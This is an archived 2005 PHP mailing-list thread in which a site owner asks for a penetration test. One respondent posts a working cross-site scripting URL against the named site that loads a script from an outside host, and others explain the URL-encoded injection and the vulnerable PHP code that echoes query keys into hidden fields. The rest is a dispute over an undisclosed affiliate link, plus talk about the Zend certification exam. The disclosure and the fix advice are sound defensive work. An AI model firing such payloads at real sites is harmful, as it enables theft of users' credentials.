do you think you could still test it since its mostly in Swedish? Thanks, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.2.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Ryan A wrote: That is extremly generious of you as I didnt really think you would have the time considering the amount of projects,books etc you are involved with (yep, I read your CV on your site :-D ), but I would like to take you up on your offer as I am sure to learn something from it...only problem is, the site I have just made is mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but do you think you could still test it since its mostly in Swedish? Ja, jeg tror jeg kan klare det. Sproget er ret ligegyldigt, jeg checker bare for XSS problemer med et automatisk tool jeg har skrevet. Så det er heller ikke så meget arbejde. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but do you think you could still test it since its mostly in Swedish? Ja, jeg tror jeg kan klare det. Sproget er ret ligegyldigt, jeg checker bare for XSS problemer med et automatisk tool jeg har skrevet. Så det er heller ikke så meget arbejde. Hehehe...its not Swedish but I understand 95+ % of it..and the balance I could guess, Is it Danish? Right now the site is on my local machine, I will be uploading it middle of the coming week after which I'll send you the site details including the login. Thanks again for you time. Regards, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.2.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Free penetration test
Hello, on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if someone gets in, create a page with the cms as proof. You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. Regards, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.0.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if someone gets in, create a page with the cms as proof. You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09src%3D%22http://3423329163/v And you are not doing any input validation either. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly! -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 src%3D%22http://3423329163/v Hi Thank you! I just saw the potential for tricking users but tell me dear boy. How can I prevent this? And you are not doing any input validation either. I fixed that. It was only in the part that echoes out the last inputed name if login fails tough because the database abstraction layer I wrote for this application escapes all data it receives. Thank you again With kind regards Andy -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Andy Pieters wrote: On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 src%3D%22http://3423329163/v Hi Thank you! I just saw the potential for tricking users but tell me dear boy. How can I prevent this? Don't display arbitrary key names in hidden fields the way you are. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
snip Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. /snip reply I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' /reply Dude, calm down, dont get your underwear in a knot, I was not attacking you or saying your intentions were not good or that the service being offered on that page is not exactly what Andy needslet me explain, you wrote: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money we like to help each other out on the listbut just come out and say it then let the receiver decide if the link is on the level or not. -- If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said he would be paying extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? - So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' - Well, all i can say is, if my little email bugged you, you either get bugged very easily or you know I'm right! (I too sometimes get bugged when people point something out and i am wrong and they are right) and for the record: I never said you are not helping Andy... but if you dont come clean and just add a simple line like: PS: I really like that site so i am an affilate of theirs, my affilate link is on the URL i sent you or something like that people wont have to doubt your motives... Or maybe I am just a goody two shoes who says itand Jay Blanchard when someone asks about templates and template engines and Chris when someone asks about SQL injections...and ...oops, too many names. Cheers, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.0.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On 5/27/05, Manuel Lemos [EMAIL PROTECTED] wrote: Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. We generally like to know however if there is potential bias in links we are being given. It gives us a better idea how to treat the advice you are giving. I'm sure the site is on the level, but when you don't mention that you potentially get paid for putting that link there(through possible referals), and we find out it makes us suspicious as to why you failed to mention it. OTOH, I think a good few of us here, would like to support each other by choosing services that each other get paid for, provided they're up front with us. Based on other posts here, I don't think you meant to deceive. I'm not attacking, or giving out to you. I'm just saying this FYI. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly! I wouldn't consider his post to be bugging you(unless he repeats it, or has already posted a similar message before). Personally however I appreciate being made aware of the issue. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Free penetration test
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 4:15 PM said:
He was apparently doing something along the lines of:
foreach($_GET as $key=$val) {
echo EOL
input type=hidden name=$key value=$val
EOL;
}
Probably just a lazyness thing. Generally you will want to keep track
of which query args are actually valid and not just parrot whatever
you get back to the user.
Oh I see.
Or if you are going to do do it this way,
recognize that you have to filter/encode both the query arg names and
the values.
One question. (Because I'm a lame brain when it comes to security as I'm
not good at imagining how things can be exploited):
Is it bad to give field names the same name as their database
counterpart? i.e. In a database the first name column might be known as
'fname'. Should a form field called 'fname' NOT be created?
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Chris W. Parker wrote: One question. (Because I'm a lame brain when it comes to security as I'm not good at imagining how things can be exploited): Is it bad to give field names the same name as their database counterpart? i.e. In a database the first name column might be known as 'fname'. Should a form field called 'fname' NOT be created? As long as you recognize that you need to filter things appropriately it doesn't really matter. Application-level Web security is not that hard. There is just 1 rule to remember. Never trust anything that comes from the user. That includes all GET, POST and Cookie data, which most people understand. But it also includes the User Agent, the Referer, and even the Host header. Anything that comes across the wire in the request can be hacked. If you have written something and you'd like me to take a quick look for any obvious exploits, feel free to mail me privately. If your site requires a login, you can send me a test login if you want so I can dig a bit deeper, otherwise I will still prod it from the outside. I'm not going to hack into your server in any way, just prod your web application a little bit with various web requests. Server-level security is a completely different kettle of fish which mostly comes down to keeping up to date with OS-level security updates. So far about 80% of sites I have looked at have had pretty serious issues. Like that www.vlaamse-kern.com one where you could trick people into sending you their usernames and passwords pretty easily. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Free penetration test
Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 src%3D%22http://3423329163/v First of all, excellent example. Don't display arbitrary key names in hidden fields the way you are. What do you mean by arbitrary key names? Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Chris W. Parker wrote:
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 11:58 AM said:
You have all sorts of problems at that URL. To start with, here is
a cross-site scripting hack:
http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
%09
src%3D%22http://3423329163/v
First of all, excellent example.
Don't display arbitrary key names in hidden fields the way you are.
What do you mean by arbitrary key names?
He was apparently doing something along the lines of:
foreach($_GET as $key=$val) {
echo EOL
input type=hidden name=$key value=$val
EOL;
}
Probably just a lazyness thing. Generally you will want to keep track
of which query args are actually valid and not just parrot whatever you
get back to the user. Or if you are going to do do it this way,
recognize that you have to filter/encode both the query arg names and
the values.
-Rasmus
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On Saturday 28 May 2005 01:05, Chris W. Parker wrote: Rasmus Lerdorf mailto:[EMAIL PROTECTED] on Friday, May 27, 2005 11:58 AM said: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript %09 src%3D%22http://3423329163/v First of all, excellent example. Don't display arbitrary key names in hidden fields the way you are. What do you mean by arbitrary key names? In this example, what was going on was that I captured the parameters passed on the url, and included them as hiddens in a form. Since it was not properly escaped, the attack succeeds by inserting a variable with value script type=text/javascript src=somewhere/script But then url encoded: %22%3E+%3Cscript+type%3D%09ext%2Fjavascript+src%3D%22somewhere%22%3E%3C%2Fscript%3E Which translates in the html document to: form... input type=hidden name=script type=text/javascript src=somewhere/script ... -- Registered Linux User Number 379093 -- --BEGIN GEEK CODE BLOCK- Version: 3.1 GAT/O/E$ d-(---)+ s:(+): a--(-)? C$(+++) UL$ P-(+)++ L+++$ E---(-)@ W++$ !N@ o? !K? W--(---) !O !M- V-- PS++(+++) PE--(-) Y+ PGP++(+++) t+(++) 5-- X++ R*(+)@ !tv b-() DI(+) D+(+++) G(+) e$@ h++(*) r--++ y--() -- ---END GEEK CODE BLOCK-- -- Check out these few php utilities that I released under the GPL2 and that are meant for use with a php cli binary: http://www.vlaamse-kern.com/sas/ -- -- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hi, I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! My bad there, while typeing the first email I meant if he signs up for a paid plan instead I wrote if he signs up... If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said would be paying he extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Stop distorting the facts. You are implying that I acting with malice by stating that I will make money by hiding facts when a) Andy never asked explicitly for a service that the referer would not gain anything b) I am not hiding anything as the affiliate id is quite visible in the URL c) I never denied that the URL contains my affiliate id. You keep saying distorting the facts, which is quite strange because this whole discussion took a turn because you in a way distorted the facts by not telling the person you were helping that you may be making money off him without his knowledge. Andy never asked explicitly for a service that the referer would not gain anything True, but if want to play that game, he never mentioned that he was looking for someone to mention a site/resource where the referrer was gaining OR not gaining anything...which is kind of stupid because when we write to the list we dont think we are making a deal with the devil so we have to cover all points and angles. This is PHP (help) list, not a list on how to best write a help email so it would hold up in a court of law- I am not hiding anything as the affiliate id is quite visible in the URL Unfortunatly for you thats quite true...and thats how this whole thing turned because I saw it, but many people (maybe Andy too) dont know what it means when someone gives them a URL with an affiliate id tacked to the end of it, common decency is to tell the person that you have a connection with that site. I never denied that the URL contains my affiliate id. If you did you would be reay stupid, and nobody is accusing you of being that. - If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. Why? because they are being open,decent AND honest about it, see the If you buy the book using the links .you are helping to support parts? Maybe I am Darth Vader and the PHP Group is the whole dark side of the force. And you tell me I am being ridiculous! clip Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? Yeah, right, you are fighting the dark side of the force to be the good guy that just lives from the air that you breath and nobody else should be allowed to gain anything from referrals unless you warn users that you refer that you are keeping a commission, despite the price is always the same!?! /clip People on this list are some of the best people I have even had the privilage of helping and being helped by...they are not really out to sucker anyone or for self gain..they help to help, no
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 05:30 PM Rory Browne said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. We generally like to know however if there is potential bias in links we are being given. There is nothing to be concerned about any bias because a) I am recommending a free service that anybody can try and evaluate and post an opinion, b) I said I tried it, it does what the original poster asked and nobody has demonstrated otherwise, c) the link is in plain text so that everybody can see the referral id, so I am not hiding anything, if I had I would not be here clarifying the facts. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 06:46 PM Ryan A said the following: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! -- If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said he would be paying extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Stop distorting the facts. You are implying that I acting with malice by stating that I will make money by hiding facts when a) Andy never asked explicitly for a service that the referer would not gain anything b) I am not hiding anything as the affiliate id is quite visible in the URL c) I never denied that the URL contains my affiliate id. If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php Maybe I am Darth Vader and the PHP Group is the whole dark side of the force. Get real, you are being ridiculous! Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? Yeah, right, you are fighting the dark side of the force to be the good guy that just lives from the air that you breath and nobody else should be allowed to gain anything from referrals unless you warn users that you refer that you are keeping a commission, despite the price is always the same!?! - So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' - Well, all i can say is, if my little email bugged you, you either get bugged very easily or you know I'm right! Look, you challenged my credibility by distorting the facts. Of course that bugs me because for 8 years I have been participating in PHP mailing lists helping people leading to solutions to the problems that they pose, and your attitude is misleading people into believing that I am not helping them. You have caused such confusion that Andy, the original poster, have written me privately telling that he thought that the link that I suggested pointed to a site of mine where I was selling security auditing services, when in fact the only person that doing that in this thread was Chris Shiflet. I just recommended a service that I tried, and so I have first hand experience to comment about, unlike you that not only just caused confusion but also did not offer any solution to the problem posed by Andy. Basically you are not helping because all you did is to bug somebody that tried to help. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
I've been looking all over the Zend Cert site, trying to find the passing rate, ie how many questions I have to get right in order to pass. Is this information secret, or have I just not looked in the right place. If it's the latter, please enlighten me. Thanks Rory -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
--- Rory Browne [EMAIL PROTECTED] wrote: I've been looking all over the Zend Cert site, trying to find the passing rate, ie how many questions I have to get right in order to pass. Is this information secret, or have I just not looked in the right place. It's not public information. Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly HTTP Developer's Handbook - Sams Coming December 2004http://httphandbook.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
Hi Rory, The passing score is not revealed. There is only a pass/fail on the test. Best, Daniel Kushner On Sun, 17 Oct 2004 19:08:32 +0100, Rory Browne [EMAIL PROTECTED] wrote: I've been looking all over the Zend Cert site, trying to find the passing rate, ie how many questions I have to get right in order to pass. Is this information secret, or have I just not looked in the right place. If it's the latter, please enlighten me. Thanks Rory -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
* Thus wrote j kensler: 1:11 1:15 1:19 heh.. I got this all graphed out on paper :) I'm simply looking for patterns to decipher what ever this is abut: - 7 (0x111) is an important key, no bit is ever added more than that - only one 10:XX - 10:07 - differences only occure between 1,2,3,4,7; cept when carried into the next hour. 0x001, 0x010, 0x011, 0x0100, 0x111 I know I'm way off but, those are some of my observations of the patterns involved. Curt -- The above comments may offend you. flame at will. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
On Thu, 30 Sep 2004 21:05:33 -0500, j kensler [EMAIL PROTECTED] wrote: 1:11 1:15 1:19 1:26 1:27 1:28 What about the durations between the times from frame to frame? like: 4,4,7,1,1 for the above. That's what I was graphing out yesterday evening. Some definate patterns in there. -- Greg Donald Zend Certified Engineer http://gdconsultants.com/ http://destiney.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
[snip] I know I'm way off but, those are some of my observations of the patterns involved. [/snip] Anyone see that sneaky Shiflett character this morning? I sent in the answer -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
--- Jay Blanchard [EMAIL PROTECTED] wrote: Anyone see that sneaky Shiflett character this morning? I sent in the answer Several people, including Jay, are very close, but no one has solved it yet. If you were thinking of taking the Zend Certification exam anyway, this could save you $200. :-) Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly HTTP Developer's Handbook - Sams Coming December 2004http://httphandbook.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
one of the Israel company say thanks . the another from an arabs country (UAE) make fun of my write . what an unbelievable thing . On Thu, 30 Sep 2004 09:34:11 +0400, M Saleh EG [EMAIL PROTECTED] wrote: God help arabs if they release books that easily ! n specialy from a person who failed in ZCE.. On Thu, 30 Sep 2004 04:03:22 +0300, Alawi Albaity [EMAIL PROTECTED] wrote: I purchase the guide before month and because I am outside US it will be inn my country after another month ( I actually bought it pdf version from phparch but because of the issue between Sams they cancel pdf version and sent the print on thier own charge for the shipment) , when I see Zend offer I take it directly but ofcourse I now must read from manual because the last day is 30th September , so I read hard , but of course not all the manual , but what I feel its important to read in the manual . I do not figure out that zend write the objective untill the last day , I take the self test and it make me feel better but the self test making you feel like if you get 3 from 5 you will success , I arrive at the center , do what it have to be done , and log in the room and I was very excited about exam when I get the test I found out its very simple and easy but because I read from manual I have confused in a lot of things in exam . Example 1 : they give 4 function and ask you to choose 2 , in all my life I was just one function and for first time now I hear there are another function which help you to calc the file size , so I choose random function . Example 2 : they give you some space to fill some text from your experience , I think I must write what they think its truth , inn example one of space I confuse what to write (object or class) because I do not get the situation of the code or thing they talk about , and think what if you write the spelling wrong but you get the idea. Example 3: they ask you about the possibility of validate user input if its for only unTrusted person or on the internet or also give you 2 choice, I think this thing is belong to me to decide on my work experience and not the opinion of the testers . at the final I feel and believe in my heart like I get 60 or 50 of exam at least correct but the I end I figure out my grade is FAILED . I have 3 years experience with php , I build a script of thousands of lines , but the really point that I do not read thing in manual untill I feel I must read and I need it, I make lot of scripts on php from 3 years , I do not work ever with streams , and i get what I need in regular expression by test and test and test for the code , if you want my advice read a lot about arrays and if the function will give you the new value or will do the process in the same array and which type of array the function must use and return and how much of arrays they can handle. I write a book in php in arabic of more than 100 and it was the first book for arabs, , I make scripts for writers , sellers , shops And now i figure out that I must read good and install manual in my brain to be success . but what the benefit of this when I read I figure out that there are a lot of thinngs usefel in php that I do not know about . and give me a keys for a new things in php that I was do not care about it in the past . I encourage the people have a good brain to save information to get the test , and encourage the people to complete thier road of development , your work is the strongest approve of your Exprience and your hardwork . the problem that youu will not be in the yellow pages in the Zend site . finally , thanks to the people who write the test they make it very good and very simple and easy , they was so fair , who got good knowldge will pass . -- Alawi Albaity Jeddah - KSA Mobile : +966506660442 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- M.Saleh.E.G 97150-4779817 -- Alawi Albaity Jeddah - KSA Mobile : +966506660442 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
I haven't done the exam, yet, but based on some of the practice questions, I'm getting worried. I'm finding sample questions whose answers are not covered in the book. One such question was a list(, $var) = whatever, and nowhere in the book could I find an explanation for same. I've also used count, and strlen many times, but I've never used count on a non-array, which is what strlen returns. I'm just don't think I've screwed up enough yet, although I've been using PHP on and off for four years. Regards Rory -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
I'm glad to hear that, cause some of them did seem a bit difficult. I understood perfectly after seeing the correct answer and the explanation, but they were a little tricky. I would be interested in feedback on the exam. I am looking into taking the test, just hoping Zend runs the $100 deal again. I know I am too late but good luck this morning. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Zend PHP Certification test
On Wed, 29 Sep 2004 15:55:29 -0700 (PDT), Chris Shiflett [EMAIL PROTECTED] wrote: I'd be interested in hearing your honest feedback after you take it, whether privately or on this list. Hopefully ZCE becomes a respected acronym, unlike MCSE. :-) I passed. I thought the test was very challenging. The areas I found most difficult were the regular expressions, and the fill in the blank questions. I didn't feel like anything in there was 'tricky' in the sense that it was purposely misleading me to the wrong answer. But at the same time I'm pretty sure you can't just study the Zend guide for a couple weeks and expect to pass. You definatly have to have some years of hands-on PHP experience. I made heavy use of the 'mark for review' feature of the test. I marked about 15 questions going through, then came back at the end and actually answered them. This helped a lot because the pressure was off once I had seen all 70 questions and still had about 40 minutes to think through the ones I marked. I admit I guessed on a few of them. I just couldn't see a clear answer on some of the regex questions. But I knew going in that was a weak area for me personally. I'm sure glad it's done. :) -- Greg Donald Zend Certified Engineer http://gdconsultants.com/ http://destiney.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
